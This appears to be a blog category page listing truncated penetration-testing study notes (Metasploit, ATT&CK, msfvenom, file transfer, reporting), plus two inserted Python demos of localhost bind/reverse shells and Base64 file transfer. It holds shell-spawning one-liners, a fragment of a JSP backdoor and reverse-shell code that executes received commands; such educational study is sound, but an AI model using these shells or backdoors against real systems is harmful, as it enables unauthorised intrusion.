Study Record

1. Modules
1) Type
(1) Auxiliary: Scanning, fuzzing, sniffing, and admin capabilities.
(2) Encoders: Ensure that payloads arrive intact at their destination.
(3) Exploits: Modules that exploit a vulnerability to allow for payload delivery.
(4) NOPs (No Operation code): Keep payload sizes consistent across exploit attempts.
(5) Payloads: Code that runs remotely and calls back to the at..
1. Discipline
1) We will never have enough time to complete the assessment.
2) Credibility can be an issue even if we write our own tools or manually exploit every service.
3) You only have to impress yourself, not the infosec community. As security researchers or penetration testers, we only have to validate vulnerabilities, not validate our ego.
2. Metasploit Architecture
1) Modules
yeon0815@htb[/htb]$ ls ..
1. Monitoring
1) ATT&CK Framework
- A globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
[Notable MITRE ATT&CK Tactics and Techniques]
(1) Initial Access
(2) Execution
- This technique depends on code supplied and planted by an attacker running on the victim host.
(3) Command & Control (C2)
- The communication channel used by attackers to remotely co..
1. Jsp BackDoor
"); out.print(""); out.print(""); out.print(""); out.print("FilePath:"); out.print(""); out.print(""); out.print(""); out.print("GOtoLink"); out.print(""); out.print(""); out.print(""); out.print(""); out.print("");}void mainMenu(JspWriter out,String web_Site)throws Exception{ out.println(""); out.println(""+ico(58)+"FileOperation(File...
1. Spawning Interactive Shells
1) /bin/sh -i
- This command executes the shell interpreter specified in the path in interactive mode (-i).
2) Perl to Shell
- If Perl is present on the system, these commands will execute the shell interpreter specified.
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
- The command directly above should be run from a script.
3) Ruby to Shell
ru..
1. Crafting Payloads with MSFvenom
1) List Payloads
yeon0815@htb[/htb]$ msfvenom -l payloads

Framework Payloads (592 total) [--payload <value>]
==================================================
    Name                                   Description
    ----                                   -----------
    linux/x86/shell/reverse_nonx_tcp       Spawn a command shell (staged..
1. Shell Validation
1) ps
yeon0815@htb[/htb]$ ps

  PID TTY          TIME CMD
 4232 pts/1    00:00:00 bash
11435 pts/1    00:00:00 ps
2) env
yeon0815@htb[/htb]$ env

SHELL=/bin/bash
2. Bind Shell
- The target system has a listener started and awaits a connection from a pentester's system.
- Admins typically configure strict incoming firewall rules and NAT on the edge of the network (public-facing), so ..
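The difference between a bind shell and a reverse shell is the direction of the TCP connection, which is exactly what the edge firewall and NAT rules mentioned above decide on. The following added example (written for this page, not code from the HTB notes) runs both patterns on 127.0.0.1 so it can be executed offline: in the bind case the "target" listens and the "attacker" connects in; in the reverse case the "attacker" listens and the "target" connects out and executes what it receives. The one-command-per-connection handler, the ephemeral port (port 0) and the echo commands are assumptions made for the demo.

```python
from __future__ import annotations

import socket
import subprocess
import threading

# Constructed demo: both roles run on localhost so the example is self-contained.
# A real target would run /bin/sh over the socket; here each side executes one
# command line and returns its output, which is enough to show the data flow.


def run_command(cmd: str) -> bytes:
    """Execute one command line the way a minimal shell handler would."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
    return proc.stdout + proc.stderr


def recv_all(sock: socket.socket) -> bytes:
    """Read until the peer closes its side of the connection."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            break
        chunks.append(data)
    return b"".join(chunks)


def listen_on_localhost() -> socket.socket:
    """Listen on an ephemeral port (assumed for the demo; a real shell picks a fixed port)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


def serve_one(listener: socket.socket) -> None:
    """Accept one connection, run one command line, send the output back, close."""
    conn, _ = listener.accept()
    with conn:
        cmd = conn.recv(4096).decode().strip()
        conn.sendall(run_command(cmd))
    listener.close()


def bind_shell_demo(cmd: str) -> bytes:
    """Bind shell: the TARGET listens and the attacker connects IN.
    This inbound connection is what strict edge firewall/NAT rules block."""
    target = listen_on_localhost()
    port = target.getsockname()[1]
    t = threading.Thread(target=serve_one, args=(target,))
    t.start()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as attacker:
        attacker.sendall(cmd.encode() + b"\n")
        out = recv_all(attacker)
    t.join()
    return out


def reverse_shell_demo(cmd: str) -> bytes:
    """Reverse shell: the ATTACKER listens and the target connects OUT.
    Outbound connections are far more likely to be permitted."""
    attacker = listen_on_localhost()
    port = attacker.getsockname()[1]

    def target_side() -> None:
        with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
            cmd_line = c.recv(4096).decode().strip()
            c.sendall(run_command(cmd_line))

    t = threading.Thread(target=target_side)
    t.start()
    conn, _ = attacker.accept()
    with conn:
        conn.sendall(cmd.encode() + b"\n")
        out = recv_all(conn)
    attacker.close()
    t.join()
    return out


if __name__ == "__main__":
    print("bind   :", bind_shell_demo("echo bind-ok").decode().strip())
    print("reverse:", reverse_shell_demo("echo reverse-ok").decode().strip())
```

Both functions return the same output for the same command; the only thing that changed between them is which side called `listen()` and which side called `connect()`. That is the whole reason reverse shells are preferred when the target sits behind inbound filtering.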
1. Meow
# Telnet
# Weak Credentials
- Utilized Tools: nmap, telnet
2. Fawn
# FTP
# Anonymous/Guest Access
- Utilized Tools: nmap, ftp
3. Dancing
# SMB
# Anonymous/Guest Access
- Utilized Tools: nmap, smbclient
4. Redeemer
# Redis
# Vulnerability Assessment
# Anonymous/Guest Access
- Utilized Tools: nmap, redis-cli
5. Explosion
# RDP
# Weak Credentials
- Utilized Tools: nmap, xfreerdp
6. Preignition
# Apache..
1. Protected File Transfers
- Data leakage during a penetration test could have severe consequences for the penetration tester, their company, and the client.
- It is essential to encrypt highly sensitive data or use encrypted data connections such as SSH, SFTP, and HTTPS. However, sometimes these options are not available to us, and a different approach is required.
1) File Encryption on Windows
(1..
1. Windows File Transfer Methods
* Fileless Threats
- The term 'fileless' suggests that a threat doesn't come in a file; instead, it uses legitimate tools built into a system to execute an attack. This doesn't mean that there is no file transfer operation. The file is not written to disk but runs in memory.
1) PowerShell Base64 Encode & Decode
- If we have access to a terminal, we can encode a file..
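The Base64 transfer described above works by pasting text into a terminal, so two practical problems decide whether it succeeds: the encoded string has to fit the command-line limits of the receiving shell, and a dropped or mangled chunk must be detected before the file is trusted. The following added example (not code from the HTB notes) shows the sender side and the receiver side of that workflow with an MD5 check, mirroring what the PowerShell notes do with `[Convert]::FromBase64String` and `Get-FileHash -Algorithm MD5`. The 4000-character chunk size and the sample payload are assumptions made for the demo.

```python
from __future__ import annotations

import base64
import hashlib

# cmd.exe caps a single command line at 8191 characters; the chunk size below is
# an assumption for the demo, chosen to stay under that with room for the
# surrounding command text. It is a multiple of 4 so every chunk is valid Base64.
CHUNK = 4000


def encode_for_paste(data: bytes, chunk: int = CHUNK) -> tuple[list[str], str]:
    """Sender side: Base64 the file, split it into paste-sized pieces,
    and return the pieces together with the MD5 the receiver must match
    (the equivalent of `base64 -w 0 file` plus `md5sum file`)."""
    b64 = base64.b64encode(data).decode("ascii")
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return pieces, hashlib.md5(data).hexdigest()


def decode_and_verify(pieces: list[str], expected_md5: str) -> bytes:
    """Receiver side: reassemble the pasted pieces, decode strictly, and refuse
    the result unless its hash matches what the sender computed."""
    # validate=True rejects stray characters introduced by a bad paste.
    data = base64.b64decode("".join(pieces), validate=True)
    actual = hashlib.md5(data).hexdigest()
    if actual != expected_md5:
        raise ValueError(f"hash mismatch: expected {expected_md5}, got {actual}")
    return data


def transfer_roundtrip(data: bytes) -> bool:
    """Full happy path: encode, 'paste', decode, verify."""
    pieces, digest = encode_for_paste(data)
    return decode_and_verify(pieces, digest) == data


def dropped_chunk_is_detected(data: bytes) -> bool:
    """Failure mode: a middle chunk never made it across. Because every chunk is
    a multiple of 4 characters, the remainder still decodes cleanly, so only the
    hash check catches the truncated file."""
    pieces, digest = encode_for_paste(data)
    if len(pieces) < 3:
        raise ValueError("sample too small to drop a middle chunk")
    damaged = pieces[:1] + pieces[2:]
    try:
        decode_and_verify(damaged, digest)
    except ValueError:
        return True
    return False


# Constructed sample payload: 10000 bytes, large enough to need four chunks.
SAMPLE = bytes(range(256)) * 39 + b"\x00" * 16


if __name__ == "__main__":
    pieces, digest = encode_for_paste(SAMPLE)
    print(f"{len(pieces)} chunks, md5 {digest}")
    print("roundtrip ok:", transfer_roundtrip(SAMPLE))
    print("dropped chunk detected:", dropped_chunk_is_detected(SAMPLE))
```

On the Windows side the same two steps are `[IO.File]::WriteAllBytes($path, [Convert]::FromBase64String($b64))` followed by `Get-FileHash $path -Algorithm MD5`; the point of the example is that the decode alone is not a success signal, because a cleanly dropped chunk still decodes.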
1. Reporting
- A strong report consists of the following sections:
1) Executive Summary
- Intended to be readable by an executive who needs a high-level overview of the details and the most important items to fix immediately, depending on their severity.
- You can also include a graphical view of the number of vulnerabilities by severity here.
2) Overview of Assessment
- This se..
1. OVAL (Open Vulnerability and Assessment Language)
- The goal of the OVAL language is to have a three-step structure during the assessment process that consists of:
1) Identifying a system's configurations for testing
2) Evaluating the current system's state
3) Disclosing the information in a report.
- OVAL definitions are recorded in an XML format.
- The 4 main classes of OVAL definitions consist o..
Sungyeon Kim
List of posts in the 'Study Record' category (Page 3)